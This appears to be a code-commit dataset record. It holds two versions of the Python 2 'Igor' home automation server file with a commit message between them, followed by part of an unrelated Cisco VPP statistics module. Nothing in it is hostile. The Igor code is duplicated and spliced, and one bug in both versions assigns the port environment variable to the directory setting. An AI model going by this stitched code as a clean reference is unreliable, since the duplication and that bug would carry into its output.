self.urlCaller = callUrl.URLCaller(self.app)
self.urlCaller.start()
#
# Fill self data
#
self.fillSelfData()
#
# Startup other components
#
self.actionHandler = None
self.updateActions()
self.eventSources = None
self.updateEventSources()
self.triggerHandler = None
self.updateTriggers()
#
# Disable debug
#
web.config.debug = False
#
# Send start action to start any plugins
#
self.urlCaller.callURL(dict(method='GET', url='/action/start'))
if advertise:
self.advertise(port)
def advertise(self, port):
if sys.platform == 'darwin':
cmd = ['dns-sd', '-R', 'igor', '_http._tcp', 'local', str(port)]
elif sys.platform == 'linux2':
cmd = ['avahi-publish', '-s', 'igor', '_http._tcp', str(port)]
else:
print >> sys.stderr, "Cannot do mdns-advertise on platform", sys.platform
return
try:
self.advertiser = subprocess.Popen(cmd)
except OSError:
print >> sys.stderr, "advertisement command failed: %s" % (' '.join(cmd))
def fillSelfData(self):
"""Put our details in the database"""
hostName = besthostname.besthostname()
url = 'http://%s:%d/data' % (hostName, self.port)
oldRebootCount = self.database.getValue('/data/services/igor/rebootCount')
rebootCount = 0
if oldRebootCount:
try:
rebootCount = int(oldRebootCount)+1
except ValueError:
pass
data = dict(host=hostName, url=url, port=self.port, startTime=int(time.time()), version=VERSION, ticker=0, rebootCount=rebootCount)
tocall = dict(method='PUT', url='/data/services/igor', mimetype='application/json', data=json.dumps(data), representing='igor/core')
self.urlCaller.callURL(tocall)
def run(self):
self.app.run(port=self.port)
def dump(self):
rv = ''
if self.urlCaller: rv += self.urlCaller.dump() + '\n'
if self.actionHandler: rv += self.actionHandler.dump() + '\n'
if self.eventSources: rv += self.eventSources.dump() + '\n'
return rv
def log(self):
    """Return the contents of the igor.log file in the data directory.

    Raises web.HTTPError (404) when no log file exists.
    """
    logfn = os.path.join(self.datadir, 'igor.log')
    if os.path.exists(logfn):
        # Close the file deterministically instead of leaking the handle.
        with open(logfn) as fp:
            return fp.read()
    # Bug fix: was `Web.HTTPError` (capital W), which raised NameError
    # instead of the intended 404 error (the module is imported as `web`).
    raise web.HTTPError('404 Log file not available')
def updateStatus(self, subcommand=None, representing=None, alive=None, resultData=None, lastActivity=None, lastSuccess=None):
    """Update status field of some service/sensor/actuator after an action.

    Records alive/lastActivity (and lastSuccess or lastFailure plus error
    details) under /data/status/<representing> in the database.
    """
    if subcommand:
        representing = subcommand
    if representing.startswith('/data/'):
        representing = representing[len('/data/'):]
    if lastActivity is None:
        lastActivity = time.time()
    else:
        lastActivity = float(lastActivity)
    if lastSuccess is None and alive:
        lastSuccess = lastActivity
    # xxxjack this needs to be done differently. Too much spaghetti.
    dbAccess = webApp.DATABASE_ACCESS
    key = 'status/' + representing
    # Check whether record exists, otherwise create it (empty)
    try:
        _ = dbAccess.get_key(key, 'application/x-python-object', 'content')
    except web.HTTPError:
        web.ctx.status = "200 OK"  # Clear error, otherwise it is forwarded from this request
        _ = dbAccess.put_key(key, 'application/x-python-object', None, '', 'text/plain')
    # Fill only entries we want
    _ = dbAccess.put_key(key + '/alive', 'application/x-python-object', None, not not alive, 'application/x-python-object')
    _ = dbAccess.put_key(key + '/lastActivity', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
    # Bug fix: only write lastSuccess when we actually have a success
    # timestamp; unconditionally writing it clobbered the previously
    # recorded last success on every failed action.
    if lastSuccess:
        _ = dbAccess.put_key(key + '/lastSuccess', 'application/x-python-object', None, lastSuccess, 'application/x-python-object')
    if alive:
        _ = dbAccess.put_key(key + '/ignoreErrorsUntil', 'application/x-python-object', None, None, 'application/x-python-object')
        resultData = ''
    else:
        _ = dbAccess.put_key(key + '/lastFailure', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
        if not resultData:
            resultData = '%s failed without error message' % representing
        if isinstance(resultData, dict):
            # Spread a dict of result details over individual status keys.
            for k, v in resultData.items():
                _ = dbAccess.put_key(key + '/' + k, 'application/x-python-object', None, v, 'application/x-python-object')
        else:
            _ = dbAccess.put_key(key + '/errorMessage', 'application/x-python-object', None, resultData, 'application/x-python-object')
    return ''
def updateActions(self):
"""Create any (periodic) event handlers defined in the database"""
startupActions = self.database.getElements('actions')
if len(startupActions):
if len(startupActions) > 1:
raise web.HTTPError('401 only one <actions> element allowed')
if not self.actionHandler:
self.actionHandler = actions.ActionCollection(self.database, self.urlCaller.callURL)
self.actionHandler.updateActions(startupActions[0])
elif self.actionHandler:
self.actionHandler.updateActions([])
return 'OK'
def updateEventSources(self):
"""Create any SSE event sources that are defined in the database"""
eventSources = self.database.getElements('eventSources')
if len(eventSources):
if len(eventSources) > 1:
raise web.HTTPError('401 only one <eventSources> element allowed')
if not self.eventSources:
self.eventSources = sseListener.EventSourceCollection(self.database, self.urlCaller.callURL)
self.eventSources.updateEventSources(eventSources[0])
elif self.eventSources:
self.eventSources.updateEventSources([])
return 'OK'
def updateTriggers(self):
pass
def runAction(self, actionname):
if not self.actionHandler:
raise web.notfound()
nodes = self.database.getElements('actions/action[name="%s"]'%actionname)
if not nodes:
raise web.notfound()
for node in nodes:
self.actionHandler.triggerAction(node)
return 'OK'
def runTrigger(self, triggername):
    """Run the named trigger. Not yet implemented.

    NOTE(review): the unconditional raise on the first line makes the
    rest of this method dead code; it is presumably kept as a sketch for
    when trigger support is implemented.
    """
    raise web.HTTPError("502 triggers not yet implemented")
    if not self.triggerHandler:
        raise web.notfound()
    triggerNodes = self.database.getElements('triggers/%s' % triggername)
    if not triggerNodes:
        raise web.notfound()
    if len(triggerNodes) > 1:
        raise web.HTTPError("502 multiple triggers %s in database" % triggername)
    triggerNode = triggerNodes[0]
    self.triggerHandler.triggerTrigger(triggerNode)
def save(self):
"""Saves the database to the filesystem"""
self.database.saveFile()
return 'OK'
def queue(self, subcommand):
"""Queues an internal command through callUrl (used for save/stop/restart)"""
self.urlCaller.callURL(dict(method='GET', url='/internal/%s' % subcommand))
return 'OK'
def started(self):
return "IgorServer started"
def stop(self):
"""Exits igorServer after saving"""
global PROFILER_STATS
if self.actionHandler:
self.actionHandler.stop()
self.actionHandler = None
if self.eventSources:
self.eventSources.stop()
self.eventSources = None
if self.triggerHandler:
self.triggerHandler.stop()
self.triggerHandler = None
if self.urlCaller:
self.urlCaller.stop()
self.urlCaller = None
self.save()
if self.profile:
self.profile.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self.profile)
else:
PROFILER_STATS.add(self.profile)
PROFILER_STATS.dump_stats("igor.profile")
sys.exit(0)
def restart(self):
"""Saves the database and restarts igorServer"""
self.save()
os.closerange(3, subprocess.MAXFD)
os.execl(sys.executable, sys.executable, *sys.argv)
def command(self):
rv = ''
if 'IGORSERVER_DIR' in os.environ:
rv = rv + 'export IGORSERVER_DIR=' + repr(os.environ['IGORSERVER_DIR']) + '\n'
if 'IGORSERVER_PORT' in os.environ:
rv = rv + 'export IGORSERVER_PORT=%d\n' % int(os.environ['IGORSERVER_PORT'])
rv = rv + 'exec %s' % repr(sys.executable)
for a in sys.argv:
rv += ' ' + repr(a)
rv += '\n'
return rv
def help(self):
rv = 'Internal igor commands:\n'
rv += 'help - this help\n'
rv += 'version - return version number\n'
rv += 'save - Make sure database is saved to disk\n'
rv += 'restart - Save and restart this Igor (may appear to fail even when executed correctly)\n'
rv += 'stop - Save and stop this Igor (may appear to fail even when executed correctly)\n'
rv += 'command - Show command line that started this Igor instance\n'
rv += 'dump - Show internal run queue of this Igor instance\n'
rv += 'log - Show httpd-style log file of this Igor instance\n'
return rv
def version(self):
return VERSION + '\n'
def main():
DEFAULTDIR=os.path.join(os.path.expanduser('~'), '.igor')
if 'IGORSERVER_DIR' in os.environ:
DEFAULTDIR = os.environ['IGORSERVER_DIR']
DEFAULTPORT=9333
if 'IGORSERVER_PORT' in os.environ:
DEFAULTDIR = int(os.environ['IGORSERVER_PORT'])
parser = argparse.ArgumentParser(description="Run the Igor home automation server")
parser.add_argument("-d", "--database", metavar="DIR", help="Database and scripts are stored in DIR (default: %s, environment IGORSERVER_DIR)" % DEFAULTDIR, default=DEFAULTDIR)
parser.add_argument("-p", "--port", metavar="PORT", type=int, help="Port to serve on (default: 9333, environment IGORSERVER_PORT)", default=DEFAULTPORT)
parser.add_argument("--debug", action="store_true", help="Enable debug output")
parser.add_argument("--advertise", action="store_true", help="Advertise service through bonjour/zeroconf")
parser.add_argument("--version", action="store_true", help="Print version and exit")
parser.add_argument("--profile", action="store_true", help="Enable Python profiler (debugging Igor only)")
parser.add_argument('--logLevel', metavar='SPEC', help="Set log levels (comma-separated list of [loggername:]LOGLEVEL)")
args = parser.parse_args()
myLogger.install(args.logLevel)
if args.version:
print VERSION
sys.exit(0)
if args.debug:
callUrl.DEBUG = True
sseListener.DEBUG = True
actions.DEBUG = True
xmlDatabase.DEBUG = True
webApp.DEBUG = True
datadir = args.database
try:
igorServer = IgorServer(datadir, args.port, args.advertise, profile=args.profile)
except IOError, arg:
print >>sys.stderr, '%s: Cannot open database: %s' % (sys.argv[0], arg)
print >>sys.stderr, '%s: Use --help option to see command line arguments' % sys.argv[0]
sys.exit(1)
igorServer.run()
#
# We need to hack the import lock. In case we get here via the easy_install igorServer script
# we are inside an __import__(), and we hold the lock. This means other threads cannot import
# and we hang once a web request comes in. We "work around" this by releasing the lock.
#
hasImportLock = imp.lock_held()
if hasImportLock:
imp.release_lock()
main()
if hasImportLock:
imp.acquire_lock()
lastSuccess was always overwritten. Fixed.
import webApp
import xmlDatabase
import actions
import sseListener
import callUrl
import os
import argparse
import besthostname
import time
import json
import web
import subprocess
import imp
import threading
import cProfile
import pstats
import myLogger
from _version import VERSION
import sys
reload(sys)
sys.setdefaultencoding('utf8')
#
# Helper for profileing multiple threads
#
PROFILER_STATS = None
def enable_thread_profiling():
'''Monkey-patch Thread.run to enable global profiling.
Each thread creates a local profiler; statistics are pooled
to the global stats object on run completion.'''
global PROFILER_STATS
import pstats
PROFILER_STATS = None
thread_run = threading.Thread.run
def profile_run(self):
print 'xxxjack profile_run'
self._prof = cProfile.Profile()
self._prof.enable()
thread_run(self)
self._prof.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self._prof)
else:
PROFILER_STATS.add(self._prof)
threading.Thread.run = profile_run
print 'xxxjack inserted profiler'
class IgorServer:
def __init__(self, datadir, port=9333, advertise=False, profile=False):
#
# Create the database, and tell the web application about it
#
self.profile = None
if profile:
enable_thread_profiling()
self.profile = cProfile.Profile()
self.profile.enable()
self.port = port
self.app = webApp.WEBAPP
self.datadir = datadir
self.database = xmlDatabase.DBImpl(os.path.join(self.datadir, 'database.xml'))
webApp.DATABASE = self.database # Have to set in a module-global variable, to be fixed some time...
webApp.SCRIPTDIR = os.path.join(datadir, 'scripts')
webApp.PLUGINDIR = os.path.join(datadir, 'plugins')
webApp.STATICDIR = os.path.join(datadir, 'static')
webApp.COMMANDS = self
#
# Create and start the asynchronous URL accessor
#
self.urlCaller = callUrl.URLCaller(self.app)
self.urlCaller.start()
#
# Fill self data
#
self.fillSelfData()
#
# Startup other components
#
self.actionHandler = None
self.updateActions()
self.eventSources = None
self.updateEventSources()
self.triggerHandler = None
self.updateTriggers()
#
# Disable debug
#
web.config.debug = False
#
# Send start action to start any plugins
#
self.urlCaller.callURL(dict(method='GET', url='/action/start'))
if advertise:
self.advertise(port)
def advertise(self, port):
if sys.platform == 'darwin':
cmd = ['dns-sd', '-R', 'igor', '_http._tcp', 'local', str(port)]
elif sys.platform == 'linux2':
cmd = ['avahi-publish', '-s', 'igor', '_http._tcp', str(port)]
else:
print >> sys.stderr, "Cannot do mdns-advertise on platform", sys.platform
return
try:
self.advertiser = subprocess.Popen(cmd)
except OSError:
print >> sys.stderr, "advertisement command failed: %s" % (' '.join(cmd))
def fillSelfData(self):
"""Put our details in the database"""
hostName = besthostname.besthostname()
url = 'http://%s:%d/data' % (hostName, self.port)
oldRebootCount = self.database.getValue('/data/services/igor/rebootCount')
rebootCount = 0
if oldRebootCount:
try:
rebootCount = int(oldRebootCount)+1
except ValueError:
pass
data = dict(host=hostName, url=url, port=self.port, startTime=int(time.time()), version=VERSION, ticker=0, rebootCount=rebootCount)
tocall = dict(method='PUT', url='/data/services/igor', mimetype='application/json', data=json.dumps(data), representing='igor/core')
self.urlCaller.callURL(tocall)
def run(self):
self.app.run(port=self.port)
def dump(self):
rv = ''
if self.urlCaller: rv += self.urlCaller.dump() + '\n'
if self.actionHandler: rv += self.actionHandler.dump() + '\n'
if self.eventSources: rv += self.eventSources.dump() + '\n'
return rv
def log(self):
    """Return the contents of the igor.log file in the data directory.

    Raises web.HTTPError (404) when no log file exists.
    """
    logfn = os.path.join(self.datadir, 'igor.log')
    if os.path.exists(logfn):
        # Close the file deterministically instead of leaking the handle.
        with open(logfn) as fp:
            return fp.read()
    # Bug fix: was `Web.HTTPError` (capital W), which raised NameError
    # instead of the intended 404 error (the module is imported as `web`).
    raise web.HTTPError('404 Log file not available')
def updateStatus(self, subcommand=None, representing=None, alive=None, resultData=None, lastActivity=None, lastSuccess=None):
    """Update status field of some service/sensor/actuator after an action.

    Records alive/lastActivity (and lastSuccess or lastFailure plus error
    details) under /data/status/<representing> in the database.
    """
    if subcommand:
        representing = subcommand
    if representing.startswith('/data/'):
        representing = representing[len('/data/'):]
    if lastActivity == None:
        lastActivity = time.time()
    else:
        lastActivity = float(lastActivity)
    if lastSuccess == None and alive:
        lastSuccess = lastActivity
    # xxxjack this needs to be done differently. Too much spaghetti.
    dbAccess = webApp.DATABASE_ACCESS
    key = 'status/' + representing
    # Check whether record exists, otherwise create it (empty)
    try:
        _ = dbAccess.get_key(key, 'application/x-python-object', 'content')
    except web.HTTPError:
        web.ctx.status = "200 OK"  # Clear error, otherwise it is forwarded from this request
        _ = dbAccess.put_key(key, 'application/x-python-object', None, '', 'text/plain')
    # Fill only entries we want
    _ = dbAccess.put_key(key + '/alive', 'application/x-python-object', None, not not alive, 'application/x-python-object')
    _ = dbAccess.put_key(key + '/lastActivity', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
    # Only write lastSuccess when we actually have a success timestamp,
    # so a failed action does not clobber the previously recorded one.
    if lastSuccess:
        _ = dbAccess.put_key(key + '/lastSuccess', 'application/x-python-object', None, lastSuccess, 'application/x-python-object')
    if alive:
        _ = dbAccess.put_key(key + '/ignoreErrorsUntil', 'application/x-python-object', None, None, 'application/x-python-object')
        resultData = ''
    else:
        _ = dbAccess.put_key(key + '/lastFailure', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
        if not resultData:
            resultData = '%s failed without error message' % representing
        if type(resultData) == type({}):
            # Spread a dict of result details over individual status keys.
            for k, v in resultData.items():
                _ = dbAccess.put_key(key + '/' + k, 'application/x-python-object', None, v, 'application/x-python-object')
        else:
            _ = dbAccess.put_key(key + '/errorMessage', 'application/x-python-object', None, resultData, 'application/x-python-object')
    return ''
def updateActions(self):
"""Create any (periodic) event handlers defined in the database"""
startupActions = self.database.getElements('actions')
if len(startupActions):
if len(startupActions) > 1:
raise web.HTTPError('401 only one <actions> element allowed')
if not self.actionHandler:
self.actionHandler = actions.ActionCollection(self.database, self.urlCaller.callURL)
self.actionHandler.updateActions(startupActions[0])
elif self.actionHandler:
self.actionHandler.updateActions([])
return 'OK'
def updateEventSources(self):
"""Create any SSE event sources that are defined in the database"""
eventSources = self.database.getElements('eventSources')
if len(eventSources):
if len(eventSources) > 1:
raise web.HTTPError('401 only one <eventSources> element allowed')
if not self.eventSources:
self.eventSources = sseListener.EventSourceCollection(self.database, self.urlCaller.callURL)
self.eventSources.updateEventSources(eventSources[0])
elif self.eventSources:
self.eventSources.updateEventSources([])
return 'OK'
def updateTriggers(self):
pass
def runAction(self, actionname):
if not self.actionHandler:
raise web.notfound()
nodes = self.database.getElements('actions/action[name="%s"]'%actionname)
if not nodes:
raise web.notfound()
for node in nodes:
self.actionHandler.triggerAction(node)
return 'OK'
def runTrigger(self, triggername):
    """Run the named trigger. Not yet implemented.

    NOTE(review): the unconditional raise on the first line makes the
    rest of this method dead code; it is presumably kept as a sketch for
    when trigger support is implemented.
    """
    raise web.HTTPError("502 triggers not yet implemented")
    if not self.triggerHandler:
        raise web.notfound()
    triggerNodes = self.database.getElements('triggers/%s' % triggername)
    if not triggerNodes:
        raise web.notfound()
    if len(triggerNodes) > 1:
        raise web.HTTPError("502 multiple triggers %s in database" % triggername)
    triggerNode = triggerNodes[0]
    self.triggerHandler.triggerTrigger(triggerNode)
def save(self):
"""Saves the database to the filesystem"""
self.database.saveFile()
return 'OK'
def queue(self, subcommand):
"""Queues an internal command through callUrl (used for save/stop/restart)"""
self.urlCaller.callURL(dict(method='GET', url='/internal/%s' % subcommand))
return 'OK'
def started(self):
return "IgorServer started"
def stop(self):
"""Exits igorServer after saving"""
global PROFILER_STATS
if self.actionHandler:
self.actionHandler.stop()
self.actionHandler = None
if self.eventSources:
self.eventSources.stop()
self.eventSources = None
if self.triggerHandler:
self.triggerHandler.stop()
self.triggerHandler = None
if self.urlCaller:
self.urlCaller.stop()
self.urlCaller = None
self.save()
if self.profile:
self.profile.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self.profile)
else:
PROFILER_STATS.add(self.profile)
PROFILER_STATS.dump_stats("igor.profile")
sys.exit(0)
def restart(self):
"""Saves the database and restarts igorServer"""
self.save()
os.closerange(3, subprocess.MAXFD)
os.execl(sys.executable, sys.executable, *sys.argv)
def command(self):
rv = ''
if 'IGORSERVER_DIR' in os.environ:
rv = rv + 'export IGORSERVER_DIR=' + repr(os.environ['IGORSERVER_DIR']) + '\n'
if 'IGORSERVER_PORT' in os.environ:
rv = rv + 'export IGORSERVER_PORT=%d\n' % int(os.environ['IGORSERVER_PORT'])
rv = rv + 'exec %s' % repr(sys.executable)
for a in sys.argv:
rv += ' ' + repr(a)
rv += '\n'
return rv
def help(self):
rv = 'Internal igor commands:\n'
rv += 'help - this help\n'
rv += 'version - return version number\n'
rv += 'save - Make sure database is saved to disk\n'
rv += 'restart - Save and restart this Igor (may appear to fail even when executed correctly)\n'
rv += 'stop - Save and stop this Igor (may appear to fail even when executed correctly)\n'
rv += 'command - Show command line that started this Igor instance\n'
rv += 'dump - Show internal run queue of this Igor instance\n'
rv += 'log - Show httpd-style log file of this Igor instance\n'
return rv
def version(self):
return VERSION + '\n'
def main():
DEFAULTDIR=os.path.join(os.path.expanduser('~'), '.igor')
if 'IGORSERVER_DIR' in os.environ:
DEFAULTDIR = os.environ['IGORSERVER_DIR']
DEFAULTPORT=9333
if 'IGORSERVER_PORT' in os.environ:
DEFAULTDIR = int(os.environ['IGORSERVER_PORT'])
parser = argparse.ArgumentParser(description="Run the Igor home automation server")
parser.add_argument("-d", "--database", metavar="DIR", help="Database and scripts are stored in DIR (default: %s, environment IGORSERVER_DIR)" % DEFAULTDIR, default=DEFAULTDIR)
parser.add_argument("-p", "--port", metavar="PORT", type=int, help="Port to serve on (default: 9333, environment IGORSERVER_PORT)", default=DEFAULTPORT)
parser.add_argument("--debug", action="store_true", help="Enable debug output")
parser.add_argument("--advertise", action="store_true", help="Advertise service through bonjour/zeroconf")
parser.add_argument("--version", action="store_true", help="Print version and exit")
parser.add_argument("--profile", action="store_true", help="Enable Python profiler (debugging Igor only)")
parser.add_argument('--logLevel', metavar='SPEC', help="Set log levels (comma-separated list of [loggername:]LOGLEVEL)")
args = parser.parse_args()
myLogger.install(args.logLevel)
if args.version:
print VERSION
sys.exit(0)
if args.debug:
callUrl.DEBUG = True
sseListener.DEBUG = True
actions.DEBUG = True
xmlDatabase.DEBUG = True
webApp.DEBUG = True
datadir = args.database
try:
igorServer = IgorServer(datadir, args.port, args.advertise, profile=args.profile)
except IOError, arg:
print >>sys.stderr, '%s: Cannot open database: %s' % (sys.argv[0], arg)
print >>sys.stderr, '%s: Use --help option to see command line arguments' % sys.argv[0]
sys.exit(1)
igorServer.run()
#
# We need to hack the import lock. In case we get here via the easy_install igorServer script
# we are inside an __import__(), and we hold the lock. This means other threads cannot import
# and we hang once a web request comes in. We "work around" this by releasing the lock.
#
hasImportLock = imp.lock_held()
if hasImportLock:
imp.release_lock()
main()
if hasImportLock:
imp.acquire_lock()
|
#!/usr/bin/env python3
#
# Copyright (c) 2021 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
This module implement Python access to the VPP statistics segment. It
accesses the data structures directly in shared memory.
VPP uses optimistic locking, so data structures may change underneath
us while we are reading. Data is copied out and it's important to
spend as little time as possible "holding the lock".
Counters are stored in VPP as a two dimensional array.
Index by thread and index (typically sw_if_index).
Simple counters count only packets, Combined counters count packets
and octets.
Counters can be accessed in either dimension.
stat['/if/rx'] - returns 2D lists
stat['/if/rx'][0] - returns counters for all interfaces for thread 0
stat['/if/rx'][0][1] - returns counter for interface 1 on thread 0
stat['/if/rx'][0][1]['packets'] - returns the packet counter
for interface 1 on thread 0
stat['/if/rx'][:, 1] - returns the counters for interface 1 on all threads
stat['/if/rx'][:, 1].packets() - returns the packet counters for
interface 1 on all threads
stat['/if/rx'][:, 1].sum_packets() - returns the sum of packet counters for
interface 1 on all threads
stat['/if/rx-miss'][:, 1].sum() - returns the sum of packet counters for
interface 1 on all threads for simple counters
'''
import os
import socket
import array
import mmap
from struct import Struct
import time
import unittest
import re
def recv_fd(sock):
    '''Receive the stats segment file descriptor over *sock*.

    The descriptor arrives as SCM_RIGHTS ancillary data; the message body
    itself is empty.
    '''
    fds = array.array("i")  # array of C ints
    _, ancdata, _, _ = sock.recvmsg(0, socket.CMSG_LEN(4))
    for level, ctype, cdata in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_RIGHTS:
            # Keep only whole ints; drop any trailing partial element.
            usable = len(cdata) - (len(cdata) % fds.itemsize)
            fds.frombytes(cdata[:usable])
    return list(fds)[0]
VEC_LEN_FMT = Struct('I')


def get_vec_len(stats, vector_offset):
    '''Equivalent to VPP vec_len(): the 32-bit element count is stored
    8 bytes before the vector data.'''
    (length,) = VEC_LEN_FMT.unpack_from(stats.statseg, vector_offset - 8)
    return length
def get_string(stats, ptr):
    '''Decode an ASCII string vector at VPP virtual address *ptr*.

    Raises ValueError when the vector would run past the mapped segment.
    '''
    offset = ptr - stats.base
    strlen = get_vec_len(stats, offset)
    if offset + strlen >= stats.size:
        raise ValueError('String overruns stats segment')
    # The final byte is excluded, matching the original slice
    # (presumably a NUL terminator -- TODO confirm against VPP).
    return stats.statseg[offset:offset + strlen - 1].decode('ascii')
class StatsVector:
    '''A class representing a VPP vector.

    Wraps a vector living in the mapped stats segment: *ptr* is the VPP
    virtual address of the data and *fmt* a struct format string for one
    element. Bounds are validated against the segment size up front, and
    all reads happen under the optimistic stats lock.
    '''
    def __init__(self, stats, ptr, fmt):
        self.vec_start = ptr - stats.base
        self.vec_len = get_vec_len(stats, ptr - stats.base)
        self.struct = Struct(fmt)
        self.fmtlen = len(fmt)
        self.elementsize = self.struct.size
        self.statseg = stats.statseg
        self.stats = stats

        if self.vec_start + self.vec_len * self.elementsize >= stats.size:
            raise ValueError('Vector overruns stats segment')

    def __iter__(self):
        with self.stats.lock:
            return self.struct.iter_unpack(self.statseg[self.vec_start:self.vec_start +
                                                        self.elementsize*self.vec_len])

    def __getitem__(self, index):
        # Valid indexes are 0 .. vec_len-1.  The previous test
        # (index > self.vec_len) let index == vec_len read one element
        # past the end, and negative indexes read outside the vector.
        if index < 0 or index >= self.vec_len:
            raise ValueError('Index beyond end of vector')
        with self.stats.lock:
            if self.fmtlen == 1:
                # Single-element format: unwrap the 1-tuple.
                return self.struct.unpack_from(self.statseg, self.vec_start +
                                               (index * self.elementsize))[0]
            return self.struct.unpack_from(self.statseg, self.vec_start +
                                           (index * self.elementsize))
class VPPStats():
    '''Main class implementing Python access to the VPP statistics segment.

    Receives the shared-memory file descriptor over the stats unix socket,
    maps the segment read-only and reads counters under an optimistic lock
    (StatsLock raises IOError when the segment changed mid-read, in which
    case the caller should retry).
    '''
    # pylint: disable=too-many-instance-attributes
    # Header layout: version, base, epoch, in_progress, directory, errors.
    shared_headerfmt = Struct('QPQQPP')
    default_socketname = '/run/vpp/stats.sock'

    def __init__(self, socketname=default_socketname, timeout=10):
        self.socketname = socketname
        self.timeout = timeout
        self.directory = {}
        self.lock = StatsLock(self)
        self.connected = False
        self.size = 0
        self.last_epoch = 0
        self.error_vectors = 0
        self.statseg = 0

    def connect(self):
        '''Connect to stats segment'''
        if self.connected:
            return
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
        sock.connect(self.socketname)

        mfd = recv_fd(sock)
        sock.close()

        stat_result = os.fstat(mfd)
        self.statseg = mmap.mmap(mfd, stat_result.st_size, mmap.PROT_READ, mmap.MAP_SHARED)
        # The mmap holds its own reference; release the received descriptor.
        socket.close(mfd)

        self.size = stat_result.st_size
        if self.version != 2:
            raise Exception('Incompatible stat segment version {}'
                            .format(self.version))
        self.refresh()
        self.connected = True

    def disconnect(self):
        '''Disconnect from stats segment'''
        if self.connected:
            self.statseg.close()
            self.connected = False

    @property
    def version(self):
        '''Get version of stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[0]

    @property
    def base(self):
        '''Get base pointer of stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[1]

    @property
    def epoch(self):
        '''Get current epoch value from stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[2]

    @property
    def in_progress(self):
        '''Get value of in_progress from stats segment'''
        return self.shared_headerfmt.unpack_from(self.statseg)[3]

    @property
    def directory_vector(self):
        '''Get pointer of directory vector'''
        return self.shared_headerfmt.unpack_from(self.statseg)[4]

    @property
    def error_vector(self):
        '''Get pointer of error vector'''
        return self.shared_headerfmt.unpack_from(self.statseg)[5]

    # Directory entry: type (I), value (Q), NUL-padded name (128s).
    elementfmt = 'IQ128s'

    def refresh(self):
        '''Refresh directory vector cache (epoch changed)'''
        directory = {}
        with self.lock:
            for direntry in StatsVector(self, self.directory_vector, self.elementfmt):
                path_raw = direntry[2].find(b'\x00')
                path = direntry[2][:path_raw].decode('ascii')
                directory[path] = StatsEntry(direntry[0], direntry[1])
            self.last_epoch = self.epoch
            self.directory = directory

            # Cache the error index vectors
            self.error_vectors = []
            for threads in StatsVector(self, self.error_vector, 'P'):
                self.error_vectors.append(StatsVector(self, threads[0], 'Q'))

    def __getitem__(self, item):
        if not self.connected:
            self.connect()
        # The directory is stale once a writer bumped the epoch.
        if self.last_epoch != self.epoch:
            self.refresh()
        with self.lock:
            return self.directory[item].get_counter(self)

    def __iter__(self):
        return iter(self.directory.items())

    def set_errors(self):
        '''Return dictionary of error counters > 0'''
        if not self.connected:
            self.connect()

        errors = {k: v for k, v in self.directory.items() if k.startswith("/err/")}
        result = {}
        with self.lock:
            for k, entry in errors.items():
                total = 0
                i = entry.value
                for per_thread in self.error_vectors:
                    total += per_thread[i]
                if total:
                    result[k] = total
        return result

    def set_errors_str(self):
        '''Return all errors counters > 0 pretty printed'''
        error_string = ['ERRORS:']
        error_counters = self.set_errors()
        for k in sorted(error_counters):
            error_string.append('{:<60}{:>10}'.format(k, error_counters[k]))
        return '%s\n' % '\n'.join(error_string)

    def get_counter(self, name):
        '''Alternative call to __getitem__'''
        return self.__getitem__(name)

    def get_err_counter(self, name):
        '''Return a single value (sum of all threads)'''
        if not self.connected:
            self.connect()
        return sum(self.directory[name].get_counter(self))

    def ls(self, patterns):
        '''Returns list of counters matching pattern(s).

        Accepts a single regex string or a list of regex strings.
        Previously a bare string was iterated character by character,
        compiling each character as its own pattern.
        '''
        # pylint: disable=invalid-name
        if not self.connected:
            self.connect()
        if not isinstance(patterns, list):
            patterns = [patterns]
        regex = [re.compile(i) for i in patterns]
        return [k for k, v in self.directory.items()
                if any(re.match(pattern, k) for pattern in regex)]

    def dump(self, counters):
        '''Given a list of counters return a dictionary of results'''
        if not self.connected:
            self.connect()
        result = {}
        for cnt in counters:
            result[cnt] = self.__getitem__(cnt)
        return result
class StatsLock():
    '''Stat segment optimistic locking.

    Readers record the segment epoch on acquire and validate it on
    release: if a writer was active or the epoch changed, the data read
    in between is invalid and release() raises IOError so the caller can
    retry.
    '''
    def __init__(self, stats):
        self.stats = stats
        self.epoch = 0

    def __enter__(self):
        acquired = self.acquire(blocking=True)
        assert acquired, "Lock wasn't acquired, but blocking=True"
        return self

    def __exit__(self, exc_type=None, exc_value=None, traceback=None):
        self.release()

    def acquire(self, blocking=True, timeout=-1):
        '''Acquire the lock. Await in progress to go false. Record epoch.

        Returns False when non-blocking and a writer is active, or when
        *timeout* (seconds) expires; True otherwise.
        '''
        self.epoch = self.stats.epoch
        if timeout > 0:
            start = time.monotonic()
        while self.stats.in_progress:
            if not blocking:
                # Non-blocking mode must fail fast; the old code slept
                # here, i.e. behaved as a blocking acquire.
                return False
            time.sleep(0.01)
            # Compare elapsed time, not the absolute clock value: the old
            # "start + time.monotonic() > timeout" was effectively always
            # true because monotonic() is a large absolute number.
            if timeout > 0 and time.monotonic() - start > timeout:
                return False
        return True

    def release(self):
        '''Check if data read while locked is valid'''
        if self.stats.in_progress or self.stats.epoch != self.epoch:
            raise IOError('Optimistic lock failed, retry')

    def locked(self):
        '''Not used'''
class StatsCombinedList(list):
    '''Column slicing for Combined counters list'''

    def __getitem__(self, item):
        '''Supports partial numpy style 2d support. Slice by column [:,1]'''
        if isinstance(item, int):
            return list.__getitem__(self, item)
        # item is a (slice, column) pair, e.g. [:, 1]
        _, column = item
        return CombinedList([row[column] for row in self])
class CombinedList(list):
